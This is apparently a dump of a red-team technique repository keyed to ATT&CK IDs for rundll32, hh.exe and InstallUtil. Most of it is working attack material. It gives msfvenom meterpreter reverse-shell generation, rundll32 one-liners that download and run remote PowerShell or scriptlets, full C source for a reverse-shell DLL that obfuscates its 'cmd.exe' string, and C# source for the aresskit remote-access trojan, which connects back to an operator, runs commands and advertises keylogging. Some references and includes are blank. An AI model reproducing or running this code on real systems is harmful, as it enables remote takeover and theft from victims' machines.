meterpreter: 30 | ``` 31 | msfvenom -p windows/meterpreter/reverse_tcp --smallest -a x86 --platform win LHOST= LPORT= -f raw | base64 32 | ``` 33 | * Replace parameter code in [`cmd.txt`](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1216/cmd.txt) with the shellcode in base64 format 34 | * Leverage [DotNetToJScript](https://github.com/tyranid/DotNetToJScript) to convert DLL `shellcode.dll` into JS file `payload.js`: 35 | ``` 36 | C:\Users\win7x64\Desktop\release_v1.0.4\DotNetToJScript.exe -c ShellCodeLauncher.Program -v v4 -s C:\Tools\cmd.txt -o c:\Tools\payload.js c:\Tools\shellcode.dll 37 | ``` 38 | * Copy the content of JS file `payload.js` and insert into the code below: 39 | ``` 40 | 41 | 42 | 49 | 50 | 56 | 57 | ``` 58 | * Save the aforementioned code as a file (e.g. `payload.sct`) 59 | 60 | ## hh.exe 61 | ### Execute 62 | Executes `calc.exe` with HTML Help. 63 | ``` 64 | hh.exe c:\windows\system32\calc.exe 65 | ``` 66 | * Usecase: Execute process with `hh.exe` 67 | * Privileges required: User 68 | * OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 69 | 70 | # References 71 | 72 | * 73 | * 74 | * 75 | * 76 | * 77 | * 78 | * 79 | * 80 | -------------------------------------------------------------------------------- /Techniques/T1085/T1085.md: -------------------------------------------------------------------------------- 1 | # Rundll32 2 | 3 | --- 4 | * **ID**: T1085 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Execute 11 | ### AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. 12 | ``` 13 | rundll32.exe AllTheThingsx64,EntryPoint 14 | (e.g. 
rundll32.exe example.dll,DllMain) 15 | ``` 16 | * Usecase: Execute dll file 17 | * Privileges required: User 18 | * OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 19 | 20 | ### Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. 21 | ``` 22 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" 23 | ``` 24 | * Usecase: Execute code from Internet 25 | * Privileges required: User 26 | * OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 27 | 28 | ### Use Rundll32.exe to execute a JavaScript script that runs calc.exe. 29 | ``` 30 | rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); 31 | ``` 32 | * Usecase: Proxy execution 33 | * Privileges required: User 34 | * OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 35 | 36 | ### Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. 37 | ``` 38 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} 39 | ``` 40 | * Usecase: Proxy execution 41 | * Privileges required: User 42 | * OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 43 | 44 | ### Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. 
45 | ``` 46 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") 47 | ``` 48 | * Usecase: Execute code from Internet (the example pulls its scriptlet from a third-party GitHub repository that you do not control and whose content can change at any time; host the scriptlet on your own infrastructure for an engagement) 49 | * Privileges required: User 50 | * OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 51 | 52 | ### Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID. 53 | ``` 54 | rundll32.exe -sta {CLSID} 55 | ``` 56 | * Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code. 57 | * Privileges required: User 58 | * OS: Windows 10 (and likely previous versions) 59 | 60 | ## Create a DLL file for Rundll32 61 | * Download and Install `MinGW`: 62 | * Ubuntu: 63 | ``` 64 | apt-get install mingw-w64 65 | ``` 66 | * Windows: 67 | * 68 | * 69 | * Create a .c file with the following code (a simple reverse shell in C). Rendering notes: the three `#include` lines lost their header names (the code needs the Winsock 2, Windows and C standard headers) and `REVERSEIP`/`REVERSEPORT` are left blank; the `#pragma comment(lib, ...)` line names the library incorrectly, which is harmless here only because the MinGW link step below passes `-lws2_32` explicitly; and `DllMain` calls `exit(0)` straight after `CreateProcess`, so the hosting `rundll32.exe` terminates as soon as the shell has been spawned: 70 | 71 | ``` 72 | /* Windows Reverse Shell*/ 73 | 74 | #define REVERSEIP "" // change to your listener IP 75 | #define REVERSEPORT // change to your listener Port 76 | 77 | #include 78 | #include 79 | #include 80 | 81 | #pragma comment(lib, "w2_32") 82 | 83 | WSADATA wsaData; 84 | SOCKET Winsock; 85 | SOCKET Sock; 86 | struct sockaddr_in hax; 87 | char aip_addr[16]; 88 | STARTUPINFO ini_processo; 89 | PROCESS_INFORMATION processo_info; 90 | 91 | 92 | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) 93 | { 94 | WSAStartup(MAKEWORD(2,2), &wsaData); 95 | Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL); 96 | 97 | hax.sin_family = AF_INET; 98 | hax.sin_port = htons(REVERSEPORT); 99 | hax.sin_addr.s_addr = inet_addr(REVERSEIP); 100 | 101 | WSAConnect(Winsock,(SOCKADDR*)&hax, sizeof(hax),NULL,NULL,NULL,NULL); 102 | if (WSAGetLastError() == 0) { 103 | 104 | memset(&ini_processo, 0, sizeof(ini_processo)); 105 | 106 | ini_processo.cb=sizeof(ini_processo); 107 | ini_processo.dwFlags=STARTF_USESTDHANDLES; 108
| ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock; 109 | 110 | char *myArray[6] = { "cm", "trump", "putin", "d.e", "x", "e" }; 111 | char command[8] = ""; 112 | snprintf( command, sizeof(command), "%s%s%s%s", myArray[0], myArray[3], myArray[4], myArray[5]); 113 | 114 | CreateProcess(NULL, command, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &ini_processo, &processo_info); 115 | exit(0); 116 | } else { 117 | exit(0); 118 | } 119 | } 120 | ``` 121 | 122 | * Compile the .c file to a .dll (the `i686-w64-mingw32-gcc` toolchain below produces a 32-bit DLL, which only the 32-bit `rundll32.exe` — `C:\Windows\SysWOW64\rundll32.exe` on 64-bit Windows — can load; use `x86_64-w64-mingw32-gcc` for a 64-bit DLL if it is to be run with the default `rundll32.exe` from a 64-bit shell): 123 | * Ubuntu: 124 | ``` 125 | i686-w64-mingw32-gcc -c shell.c 126 | i686-w64-mingw32-gcc -shared -o shell.dll shell.o -lws2_32 127 | ``` 128 | * Windows: 129 | ``` 130 | gcc -c shell.c 131 | gcc -shared -o shell.dll shell.o -lws2_32 132 | ``` 133 | - Run it through `rundll32.exe`: 134 | ``` 135 | rundll32.exe shell.dll,DllMain 136 | ``` 137 | 138 | # References 139 | 140 | * 141 | * 142 | -------------------------------------------------------------------------------- /Techniques/T1219/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Linq; 3 | using System.Net.Sockets; 4 | using System.Reflection; 5 | 6 | namespace aresskit 7 | { 8 | 9 | [System.ComponentModel.RunInstaller(true)] 10 | public class InstallUtil : System.Configuration.Install.Installer 11 | { 12 | //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary. 13 | public override void Install(System.Collections.IDictionary savedState) 14 | { 15 | //Place Something Here... For Confusion/Distraction 16 | } 17 | 18 | //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary. 19 | public override void Uninstall(System.Collections.IDictionary savedState) 20 | { 21 | Program.Main(); 22 | } 23 | } 24 | 25 | class Program 26 | { 27 | const string server = ""; // Server Hostname or IP Address to connect back to.
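const int port = 0; // TCP Port to connect back to (blank in the original listing; set it before building).
const bool hideConsole = false; // Show/Hide malicious console on Clients (victims) computer.
const string cmdSplitter = "::"; // Characters to split Class/Method in command input (ex: Administration::IsAdmin or Administration->IsAdmin)

/// <summary>
/// Connects back to the operator's listener and services commands until the peer
/// disconnects or sends "exit" / "kill".
/// Lab use only: the channel is plaintext TCP with no authentication (anyone who can
/// reach the listener can drive this host), and the fixed "aresskit> " prompt written on
/// every turn is a usable network signature for detection engineering.
/// </summary>
/// <param name="server">Listener hostname or IP address.</param>
/// <param name="port">Listener TCP port.</param>
/// <remarks>
/// Returns on any connection failure instead of retrying; Program.Main owns the retry and
/// its 5-second back-off. The original called itself again in a tight loop from the
/// catch-all, which busy-spins and eventually overflows the stack while the listener is
/// unreachable.
/// </remarks>
private static void sendBackdoor(string server, int port)
{
    try
    {
        using (TcpClient client = new TcpClient(server, port))
        using (NetworkStream stream = client.GetStream())
        {
            while (true)
            {
                byte[] prompt = Misc.byteCode("aresskit> ");
                stream.Write(prompt, 0, prompt.Length); // Send prompt

                byte[] data = new byte[256];
                int bytes = stream.Read(data, 0, data.Length);
                if (bytes == 0)
                {
                    break; // Peer closed the connection (the original kept looping on a dead socket).
                }

                // Trim() also removes the "\r" that Windows clients send; the original stripped
                // only "\n", so "exit", "kill" and "help" never matched from such a client.
                string responseData = System.Text.Encoding.ASCII.GetString(data, 0, bytes).Trim();
                byte[] output = Misc.byteCode("");

                if (responseData == "exit")
                {
                    break; // Disconnect the attacker from the C&C backdoor.
                }
                if (responseData == "kill")
                {
                    Environment.Exit(0); // Exit cleanly upon command 'kill'
                }

                if (responseData.StartsWith("cd ", StringComparison.Ordinal))
                {
                    output = ChangeDirectory(responseData.Substring(3));
                }
                else if (responseData == "help")
                {
                    output = Misc.byteCode(BuildHelpMenu());
                }
                else if (responseData.Length > 0)
                {
                    output = DispatchCommand(responseData);
                }

                try
                {
                    stream.Write(output, 0, output.Length); // Send output of command back to attacker.
                }
                catch (Exception)
                {
                    break; // Peer went away mid-write; the using blocks close the socket.
                }
            }
        }
    }
    catch (Exception)
    {
        // Connect/read failure: fall through so Main's retry loop reconnects after its delay.
    }
}

/// <summary>
/// Handles "cd &lt;dir&gt;". The original compared the whole line with "cd", so a
/// directory argument never matched and the command fell through to the dispatcher.
/// </summary>
/// <param name="argument">Everything after "cd ".</param>
/// <returns>Empty output on success, the exception message on failure.</returns>
private static byte[] ChangeDirectory(string argument)
{
    try
    {
        System.IO.Directory.SetCurrentDirectory(argument.Trim());
        return Misc.byteCode("");
    }
    catch (Exception e)
    {
        return Misc.byteCode(e.Message + "\n");
    }
}

/// <summary>
/// Lists every class in the aresskit namespace and its methods via reflection
/// (the "help" command). Compiler-generated closure classes and the keyboard-hook
/// delegate are filtered out, as in the original.
/// </summary>
/// <returns>The help text, one class per line.</returns>
private static string BuildHelpMenu()
{
    string helpMenu = "\n";
    var theList = Assembly.GetExecutingAssembly().GetTypes().Where(t => t.Namespace == "aresskit").ToList();
    theList.Remove(typeof(_)); // List.Remove is a no-op when absent; RemoveAt(IndexOf(...)) threw on -1.

    foreach (Type x in theList)
    {
        if (x.Name != "<>c" && x.Name != "LowLevelKeyboardProc") // To rid away unused Classes
        {
            helpMenu += Misc.ShowMethods(x) + "\n";
        }
    }
    return helpMenu;
}

/// <summary>
/// Resolves "Class::Method [args...]" against the aresskit namespace by reflection and
/// invokes it. Only a single string parameter is supported (the remaining words are joined
/// with trailing spaces); any exception is reported to the operator as its message.
/// </summary>
/// <param name="responseData">The trimmed command line received from the operator.</param>
/// <returns>The encoded output to send back.</returns>
private static byte[] DispatchCommand(string responseData)
{
    if (!responseData.Contains(cmdSplitter))
    {
        return Misc.byteCode("'" + responseData.Replace("\n", "") + "' is not a recognized command.\n");
    }

    try
    {
        // Will produce: (class name), (method name), [arg](,)[arg]...
        string[] classMethod = responseData.Split(new[] { cmdSplitter }, StringSplitOptions.None);
        string[] methodData = classMethod[1].Split(new char[0]);

        Type methodType = Type.GetType("aresskit." + classMethod[0]); // Get type: aresskit.Class
        // Check for null BEFORE touching the MethodInfo: the original called GetParameters()
        // on a null result first, so an unknown method reported a NullReferenceException
        // message instead of the intended "No such class/method" one.
        MethodInfo methodInstance = methodType == null ? null : methodType.GetMethod(methodData[0]);
        if (methodInstance == null)
        {
            return Misc.byteCode("No such class/method with the name '" + classMethod[0] + cmdSplitter + classMethod[1] + "'");
        }

        object classInstance = Activator.CreateInstance(methodType); // Create instance of 'aresskit.Class'
        ParameterInfo[] methodParameters = methodInstance.GetParameters();
        if (methodParameters.Length == 0)
        {
            return Misc.byteCode(methodInstance.Invoke(classInstance, null) + "\n");
        }

        string[] parameterArray = { "" };
        if (methodParameters[0].ParameterType == typeof(string))
        {
            // Joined with trailing spaces exactly as before; stays null when no words follow.
            string parameterString = default(string);
            for (int i = 1; i < methodData.Length; i++)
            {
                parameterString += methodData[i] + " ";
            }
            parameterArray[0] = parameterString;
        }
        return Misc.byteCode(methodInstance.Invoke(classInstance, parameterArray).ToString() + "\n");
    }
    catch (Exception e)
    {
        return Misc.byteCode(e.Message + "\n");
    }
}

/// <summary>
/// Entry point. Also called from InstallUtil.Uninstall above (presumably the
/// InstallUtil.exe /U launch path). Loops forever: when the reachability probe succeeds,
/// or no server is configured, it connects back, then sleeps 5 seconds before trying again.
/// </summary>
public static void Main()
{
    // Hide Window
    if (hideConsole)
        Toolkit.HideWindow();

    // Fully featured Remote Administration Tool (RAT)
    /*
     * Aresskit comes equipped with networking tools and administration tools such as:
     * - Built-In Port Scanner
     * - Reverse Command Prompt Shell (minimalistic, no auth required)
     * - UDP/TCP Port Listener (similar to Netcat)
     * - File downloader/uploader
     * - Screenshot(s)
     * - Real-Time and Log-based Keylogger
     * - Self-destruct feature (protect your privacy)
     */

    while (true)
    {
        // NOTE(review): server == "" does not disable the connect-back; sendBackdoor is still
        // called with an empty host and fails inside its own catch. The bing.com probe is itself
        // a periodic beacon (checkInternetConn's mechanism is not visible in this file).
        if (Network.checkInternetConn("www.bing.com") || server == "")
        {
            try
            {
                // Console.WriteLine("Sending RAT terminal to: {0}, port: {1}", server, port);
                sendBackdoor(server, port);
            }
            catch (SocketException) // Attacker Server has most likely forced disconnect
            { Console.WriteLine("Attacker has disconnected."); }
            catch (Exception e)
            { Console.WriteLine(e); } // pass silently
        }
        System.Threading.Thread.Sleep(5000); // sleep for 5 seconds before retrying
    }
}
}
}
--------------------------------------------------------------------------------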